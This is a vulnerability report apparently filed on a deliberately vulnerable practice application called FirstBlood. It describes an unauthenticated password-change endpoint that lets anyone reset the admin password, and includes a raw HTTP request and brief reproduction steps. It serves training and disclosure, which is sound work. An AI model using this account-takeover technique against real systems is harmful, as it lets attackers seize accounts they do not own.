FirstBlood-#1000Change Password of admin user
This issue was discovered on FirstBlood v3

On 2022-12-08, ayush1098 Level 8 reported:

Hello Team,


From previous hackevents reports, I gathered the /drpanel/drapi/editpassword.php endpoint and it works in this version also. I can change the password of any user(admin in this case) and there is no CSRF protection on this page so we can exploit easily.

Steps To Reproduce:

  1. Send this request in burpsuite and you will get the password in response.
POST /drpanel/drapi/editpassword.php HTTP/1.1
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Length: 29


Note the username parameter and the Content-Length in the above request.


Anyone can change the admin password and can manipulate the user data.

Thanks & Regards Ayush Singh


Endpoint: /drpanel/drapi/editpassword.php

Parameter: NA

Payload: Na

FirstBlood ID: 52
Vulnerability Type: Auth issues

The endpoint /drpanel/drapi/editpassword.php still allows an unauthenticated user to modify the password of any account if the username is known. The username was renamed from previous versions from drAdmin to admin

Report Feedback


Creator & Administrator

Congratulations you were the first to discover this bug! The lack of CSRF protection on this endpoint is something considered informative as the attacker doesn't need CSRF to gain access (Yes they could lock the admin out, but they could easily regain access)